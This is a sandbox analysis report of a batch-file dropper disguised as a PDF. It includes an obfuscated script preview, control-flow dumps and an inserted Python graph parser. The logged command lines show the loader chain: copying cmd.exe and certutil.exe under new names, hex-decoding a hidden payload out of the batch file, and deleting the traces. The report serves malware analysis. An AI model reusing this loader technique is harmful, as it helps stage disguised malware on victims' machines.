                                      File size:3'675'586 bytes
                                      MD5:91f00c06e8cc61fe9239eefdb0dd0c03
                                      SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
                                      SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
                                      SHA512:fd8f0a8bedac0ca36d89e2ecbdf2ac445ff1ee4e0a298791b75bcfdf87d21dc5a71ea757b0ee4aeb82f29f55f839eb313f1fe15760e9612b80dbf5b4d326ca0a
                                      SSDEEP:49152:ZbnfQw2CN7WB0bIUvBafMtLz4Grc+UcqodC2W:E
                                      TLSH:C4064E9739BF1F87170E366B7F4BAB444A9ECC240A83DB8C42D611D8580B27F69F0959
                                      File Content Preview:..&@cls&@set "_..=Rfoc 7NDyWUq13FOX20QjaLIlwkg8VM9uiASHrCtTnKEedGYpZsP6B4zm@v5hJxb"..%_..:~57,1%%_..:~50,1%%_..:~44,1%%_..:~39,1%%_..:~4,1%"_....=%_..:~46,1%%_..:~15,1%%_..:~49,1%%_..:~0,1%%_..:~37,1%%_..:~42,1%%_..:~23,1%%_..:~40,1%%_..:~19,1%%_..:~60,1%
                                      Icon Hash:9686878b929a9886
                                      No network behavior found


                                      Target ID:0
                                      Start time:07:23:08
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
                                      Imagebase:0x7ff6b84e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:07:23:08
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\extrac32.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                      Imagebase:0x7ff7b5ef0000
                                      File size:35'328 bytes
                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:4
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\extrac32.exe
                                      Wow64 process (32bit):false
                                      Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      Imagebase:0x7ff7b5ef0000
                                      File size:35'328 bytes
                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:6
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\kn.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                      Imagebase:0x7ff6aa1e0000
                                      File size:1'651'712 bytes
                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:8
                                      Start time:07:23:10
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:07:23:10
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\kn.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                      Imagebase:0x7ff6aa1e0000
                                      File size:1'651'712 bytes
                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:10
                                      Start time:07:23:10
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:07:23:11
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:5.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:31.6%
                                        Total number of Nodes:620
                                        Total number of Limit Nodes:22
                                        execution_graph: interactive node/edge listing for the alpha.exe image (base 0x7ff7cd480000); the raw graph data is not rendered here. Windows APIs referenced by the graph nodes include RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, GetConsoleTitleW, SetConsoleTitleW, SetConsoleMode, SearchPathW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, CreateProcessW, CreateProcessAsUserW, DeleteProcThreadAttributeList, VirtualQuery, VirtualFree, _setjmp and longjmp.
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                        • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                        • API String ID: 3305344409-4288247545
                                        • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                        • Instruction ID: f59f466bf3d194420bf07580d70786908cb9e20fd8e180badbe2ab844d814d04
                                        • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                        • Instruction Fuzzy Hash: 3C42D821B0CA8285EB60BF1298446B9A7A6AF857B5FC44135DF2E477D4FF3CE6458320

                                        Similarity
                                        • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                        • String ID: :$:$:$:ON$OFF
                                        • API String ID: 972821348-467788257
                                        • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction ID: 0d22c9a4b0c31640e32dad20064c3190ec93bd06ff7c4d8b9a73e75567398a24
                                        • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                        • Instruction Fuzzy Hash: 2522C421B0C74286EB54BF629854278E696EF54BA0FC88035CF2E87795FF7CA644C720

                                        Similarity
                                        • API ID: InfoLocale$DefaultUsersetlocale
                                        • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                        • API String ID: 1351325837-2236139042
                                        • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction ID: b2babf9aa371426257b97580b03aacec08c68d66b1f47fcb807a0b6a28bfa055
                                        • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                        • Instruction Fuzzy Hash: F6F14A21B0CA4295EF21AF12D5106B9B6AABF54BA0FD44136CF2D57694FF3CEA05C360

                                        Similarity
                                        • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                        • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                        • API String ID: 388421343-2905461000
                                        • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction ID: 955f4deb36f33b898e671ec2c20bc8e7eb73f5ef3a833e9643b8239704732ad8
                                        • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                        • Instruction Fuzzy Hash: EAF14E31B0CA8295EA60AF52E444BB9F7A5FB857A0F844139DF6D42754EF3CE644CB20

                                        Similarity
                                        • API ID: QueryValue$CloseOpensrandtime
                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                        • API String ID: 145004033-3846321370
                                        • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction ID: e1c7cb2d574ece889a5a590aefa0558f7204a62cca21a1311226f46b0f8dcc6a
                                        • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                        • Instruction Fuzzy Hash: 6AE1913262CA82D6EB60AF51E44057AF7A5FB98760FC01135EF9E02A54EF7CD644CB20

                                        Similarity
                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                        • API String ID: 2624720099-1920437939
                                        • Opcode ID: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction ID: 0fe49145f9bf2d30ca7e254681b1fa9e8ecc8978aa4994e345a10d6451e7baa3
                                        • Opcode Fuzzy Hash: 55b52e5a2b3acbca3b84206f59cb707dd6bfbe805ca415e9fcd69b4faf1a1c67
                                        • Instruction Fuzzy Hash: 3FC1B231F0CA428AF714BF62A444978FAA6FF49774F844139DF2E46691FE3CA6418720

                                        Control-flow Graph

                                        control_flow_graph 1118 7ff7cd49823c-7ff7cd49829b FindFirstFileExW 1119 7ff7cd4982cd-7ff7cd4982df 1118->1119 1120 7ff7cd49829d-7ff7cd4982a9 GetLastError 1118->1120 1124 7ff7cd498365-7ff7cd49837b FindNextFileW 1119->1124 1125 7ff7cd4982e5-7ff7cd4982ee 1119->1125 1121 7ff7cd4982af 1120->1121 1123 7ff7cd4982b1-7ff7cd4982cb 1121->1123 1127 7ff7cd4983d0-7ff7cd4983e5 FindClose 1124->1127 1128 7ff7cd49837d-7ff7cd498380 1124->1128 1126 7ff7cd4982f1-7ff7cd4982f4 1125->1126 1129 7ff7cd4982f6-7ff7cd498300 1126->1129 1130 7ff7cd498329-7ff7cd49832b 1126->1130 1127->1126 1128->1119 1131 7ff7cd498386 1128->1131 1132 7ff7cd498332-7ff7cd498353 GetProcessHeap HeapAlloc 1129->1132 1133 7ff7cd498302-7ff7cd49830e 1129->1133 1130->1121 1134 7ff7cd49832d 1130->1134 1131->1120 1137 7ff7cd498356-7ff7cd498363 1132->1137 1135 7ff7cd498310-7ff7cd498313 1133->1135 1136 7ff7cd49838b-7ff7cd4983c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 1140 7ff7cd498315-7ff7cd498323 1135->1140 1141 7ff7cd498327 1135->1141 1138 7ff7cd4a50f8-7ff7cd4a511e GetLastError FindClose 1136->1138 1139 7ff7cd4983c8-7ff7cd4983ce 1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1130
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorFileFindFirstLast
                                        • String ID:
                                        • API String ID: 873889042-0
                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction ID: d5de5088dd78f0923a8a8dc46670348a4b58465f41d834724065a0b6555cb53e
                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                        • Instruction Fuzzy Hash: 28513A36B0DB4296E710AF16E444579FBA6FB99BA1F848131CF2D43350EF3CE6548620
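The routine above (FindFirstFileExW, FindNextFileW in a loop, a result buffer grown with HeapAlloc/HeapReAlloc, FindClose on both the normal and the error path) is a directory enumeration helper. Its graph, like every control_flow_graph line in this report, is a flat token stream: block id, address range, the API names (and "call <addr>" internal calls) executed in that block, then "src->dst" edges. The Python below is an added example, not part of the Joe Sandbox report or of its IDA plugin; it parses that stream so API call sites, exit blocks and the shortest entry-to-call-site path can be pulled out of a report mechanically during triage instead of by eye. The format details (the "call <addr>" pairs and the "GetProcAddress * 3" repetition shorthand) are inferred from the dumps on this page, and the sample input is the graph above copied verbatim. One caveat when reading these records: the String IDs of the neighbouring functions (DisableCMD under Software\Policies\Microsoft\Windows\System, COMSPEC, PATHEXT with its default .COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, \CMD.EXE, and the GetProcAddress lookups of CopyFileExW, IsDebuggerPresent and SetConsoleInputExeNameW in KERNEL32.DLL) are what cmd.exe's own initialisation code contains, so treat these graphs as describing the command interpreter the batch file runs, not attacker-written payload logic.

```python
"""Parse Joe Sandbox 'control_flow_graph' text dumps into basic blocks and edges.

Added example (not from the report). Format, inferred from the dumps on the page:
    <id> <start>[-<end>] [<API> | call <addr> | * <count>]...   and   <src>-><dst>
"""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{6,16}(?:-[0-9a-f]{6,16})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Sample input: the FindFirstFileExW / FindNextFileW / FindClose routine above, copied verbatim.
SAMPLE = (
    "control_flow_graph 1118 7ff7cd49823c-7ff7cd49829b FindFirstFileExW 1119 7ff7cd4982cd-7ff7cd4982df "
    "1118->1119 1120 7ff7cd49829d-7ff7cd4982a9 GetLastError 1118->1120 1124 7ff7cd498365-7ff7cd49837b "
    "FindNextFileW 1119->1124 1125 7ff7cd4982e5-7ff7cd4982ee 1119->1125 1121 7ff7cd4982af 1120->1121 "
    "1123 7ff7cd4982b1-7ff7cd4982cb 1121->1123 1127 7ff7cd4983d0-7ff7cd4983e5 FindClose 1124->1127 "
    "1128 7ff7cd49837d-7ff7cd498380 1124->1128 1126 7ff7cd4982f1-7ff7cd4982f4 1125->1126 "
    "1129 7ff7cd4982f6-7ff7cd498300 1126->1129 1130 7ff7cd498329-7ff7cd49832b 1126->1130 1127->1126 "
    "1128->1119 1131 7ff7cd498386 1128->1131 1132 7ff7cd498332-7ff7cd498353 GetProcessHeap HeapAlloc "
    "1129->1132 1133 7ff7cd498302-7ff7cd49830e 1129->1133 1130->1121 1134 7ff7cd49832d 1130->1134 "
    "1131->1120 1137 7ff7cd498356-7ff7cd498363 1132->1137 1135 7ff7cd498310-7ff7cd498313 1133->1135 "
    "1136 7ff7cd49838b-7ff7cd4983c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 "
    "1140 7ff7cd498315-7ff7cd498323 1135->1140 1141 7ff7cd498327 1135->1141 "
    "1138 7ff7cd4a50f8-7ff7cd4a511e GetLastError FindClose 1136->1138 1139 7ff7cd4983c8-7ff7cd4983ce "
    "1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1130"
)


def parse_cfg(text):
    """Return (nodes, edges): nodes = id -> {'range': str, 'calls': [labels]}, edges = id -> [ids]."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    nodes, edges, cur, i = {}, defaultdict(list), None, 1
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[int(m.group(1))].append(int(m.group(2)))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = int(tok)                      # new basic block: id followed by its address range
            nodes[cur] = {"range": tokens[i + 1], "calls": []}
            i += 2
        elif cur is None:
            raise ValueError(f"label {tok!r} appears before any block")
        elif tok == "call" and i + 1 < len(tokens):
            nodes[cur]["calls"].append("call " + tokens[i + 1])   # internal (non-imported) call
            i += 2
        elif tok == "*" and i + 1 < len(tokens):
            # 'GetProcAddress * 3' means the preceding API is called three times in this block
            prev = nodes[cur]["calls"][-1]
            nodes[cur]["calls"].extend([prev] * (int(tokens[i + 1]) - 1))
            i += 2
        else:
            nodes[cur]["calls"].append(tok)     # imported API name
            i += 1
    return nodes, dict(edges)


def entry_node(nodes):
    """The first block listed in a dump is the function entry."""
    return next(iter(nodes))


def reachable(edges, start):
    seen, queue = {start}, deque([start])
    while queue:
        for dst in edges.get(queue.popleft(), []):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return seen


def shortest_path(edges, src, dst):
    """Breadth-first search; returns the block ids from src to dst, or None if unreachable."""
    parent, queue = {src: None}, deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for nxt in edges.get(n, []):
            if nxt not in parent:
                parent[nxt] = n
                queue.append(nxt)
    return None


def exit_nodes(nodes, edges):
    """Blocks with no successors, i.e. the function's return/unwind points."""
    return sorted(n for n in nodes if not edges.get(n))


def call_sites(nodes, api):
    return sorted(n for n, info in nodes.items() if api in info["calls"])


def distinct_apis(nodes):
    """Imported API names used anywhere in the function ('call <addr>' internals excluded)."""
    return sorted({c for info in nodes.values() for c in info["calls"] if not c.startswith("call ")})


if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE)
    start = entry_node(nodes)
    print(f"{len(nodes)} blocks, entry {start} at {nodes[start]['range']}, exits {exit_nodes(nodes, edges)}")
    print("APIs:", ", ".join(distinct_apis(nodes)))
    for api in ("HeapReAlloc", "FindClose"):
        for site in call_sites(nodes, api):
            print(f"{api} in block {site}: path {shortest_path(edges, start, site)}")
```

Feed any control_flow_graph line from a report to parse_cfg; splitting on whitespace means the lines that the page wraps across two rows can be joined first without further cleanup. Blocks the sandbox marked "Not Executed" are not distinguishable in the text dump, so the paths reported are static reachability, not what ran.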

                                        Control-flow Graph

                                        control_flow_graph 1142 7ff7cd492978-7ff7cd4929b6 1143 7ff7cd4929b9-7ff7cd4929c1 1142->1143 1143->1143 1144 7ff7cd4929c3-7ff7cd4929c5 1143->1144 1145 7ff7cd49e441 1144->1145 1146 7ff7cd4929cb-7ff7cd4929cf 1144->1146 1147 7ff7cd4929d2-7ff7cd4929da 1146->1147 1148 7ff7cd4929dc-7ff7cd4929e1 1147->1148 1149 7ff7cd492a1e-7ff7cd492a3e FindFirstFileW 1147->1149 1148->1149 1152 7ff7cd4929e3-7ff7cd4929eb 1148->1152 1150 7ff7cd492a44-7ff7cd492a5c FindClose 1149->1150 1151 7ff7cd49e435-7ff7cd49e439 1149->1151 1153 7ff7cd492a62-7ff7cd492a6e 1150->1153 1154 7ff7cd492ae3-7ff7cd492ae5 1150->1154 1151->1145 1152->1147 1155 7ff7cd4929ed-7ff7cd492a1c call 7ff7cd498f80 1152->1155 1156 7ff7cd492a70-7ff7cd492a78 1153->1156 1157 7ff7cd49e3f7-7ff7cd49e3ff 1154->1157 1158 7ff7cd492aeb-7ff7cd492b10 _wcsnicmp 1154->1158 1156->1156 1161 7ff7cd492a7a-7ff7cd492a8d 1156->1161 1158->1153 1162 7ff7cd492b16-7ff7cd49e3f1 _wcsicmp 1158->1162 1161->1145 1163 7ff7cd492a93-7ff7cd492a97 1161->1163 1162->1153 1162->1157 1165 7ff7cd49e404-7ff7cd49e407 1163->1165 1166 7ff7cd492a9d-7ff7cd492ade memmove call 7ff7cd4913e0 1163->1166 1167 7ff7cd49e40b-7ff7cd49e413 1165->1167 1166->1152 1167->1167 1169 7ff7cd49e415-7ff7cd49e42b memmove 1167->1169 1169->1151
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction ID: b3cf702627eb1424f6585d36a976f923506730957eb3242a0acb53d3a9686309
                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                        • Instruction Fuzzy Hash: 8B510A22B0D68196EA30AF16A544A7AE296FB54BB4FC45230DF7E076D1FF3CE6418710

                                        Control-flow Graph

                                        control_flow_graph 643 7ff7cd494d5c-7ff7cd494e4b InitializeCriticalSection call 7ff7cd4958e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7cd490580 call 7ff7cd494a14 call 7ff7cd494ad0 call 7ff7cd495554 GetCommandLineW 654 7ff7cd494e4d-7ff7cd494e54 643->654 654->654 655 7ff7cd494e56-7ff7cd494e61 654->655 656 7ff7cd4951cf-7ff7cd4951e3 call 7ff7cd483278 call 7ff7cd494c1c 655->656 657 7ff7cd494e67-7ff7cd494e7b call 7ff7cd492e44 655->657 662 7ff7cd494e81-7ff7cd494ec3 GetCommandLineW call 7ff7cd4913e0 call 7ff7cd48ca40 657->662 663 7ff7cd4951ba-7ff7cd4951ce call 7ff7cd483278 call 7ff7cd494c1c 657->663 662->663 674 7ff7cd494ec9-7ff7cd494ee8 call 7ff7cd49417c call 7ff7cd492394 662->674 663->656 678 7ff7cd494eed-7ff7cd494ef5 674->678 678->678 679 7ff7cd494ef7-7ff7cd494f1f call 7ff7cd48aa54 678->679 682 7ff7cd494f21-7ff7cd494f30 679->682 683 7ff7cd494f95-7ff7cd494fee GetConsoleOutputCP GetCPInfo call 7ff7cd4951ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7cd494f32-7ff7cd494f39 682->684 689 7ff7cd494ff0-7ff7cd495006 GetConsoleTitleW 683->689 690 7ff7cd495012-7ff7cd495018 683->690 684->683 686 7ff7cd494f3b-7ff7cd494f77 call 7ff7cd483278 GetWindowsDirectoryW 684->686 695 7ff7cd4951b1-7ff7cd4951b9 call 7ff7cd494c1c 686->695 696 7ff7cd494f7d-7ff7cd494f90 call 7ff7cd493c24 686->696 689->690 692 7ff7cd495008-7ff7cd49500f 689->692 693 7ff7cd49507a-7ff7cd49507e 690->693 694 7ff7cd49501a-7ff7cd495024 call 7ff7cd493578 690->694 692->690 697 7ff7cd495080-7ff7cd4950b3 call 7ff7cd4ab89c call 7ff7cd48586c call 7ff7cd483240 call 7ff7cd493448 693->697 698 7ff7cd4950eb-7ff7cd495161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 706 7ff7cd495026-7ff7cd495030 694->706 695->663 696->683 724 7ff7cd4950d2-7ff7cd4950d7 call 7ff7cd483278 697->724 725 7ff7cd4950b5-7ff7cd4950d0 call 7ff7cd493448 * 2 697->725 703 7ff7cd49516f 698->703 704 7ff7cd495163-7ff7cd495167 698->704 710 7ff7cd495172-7ff7cd4951af 
free call 7ff7cd498f80 703->710 704->703 709 7ff7cd495169-7ff7cd49516d 704->709 711 7ff7cd495032-7ff7cd495059 GetStdHandle GetConsoleScreenBufferInfo 706->711 712 7ff7cd495075 call 7ff7cd4acff0 706->712 709->703 709->710 715 7ff7cd495069-7ff7cd495073 711->715 716 7ff7cd49505b-7ff7cd495067 711->716 712->693 715->693 715->712 716->693 729 7ff7cd4950dc-7ff7cd4950e6 GlobalFree 724->729 725->729 729->698
                                        APIs
                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494D9A
                                          • Part of subcall function 00007FF7CD4958E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7CD4AC6DB), ref: 00007FF7CD4958EF
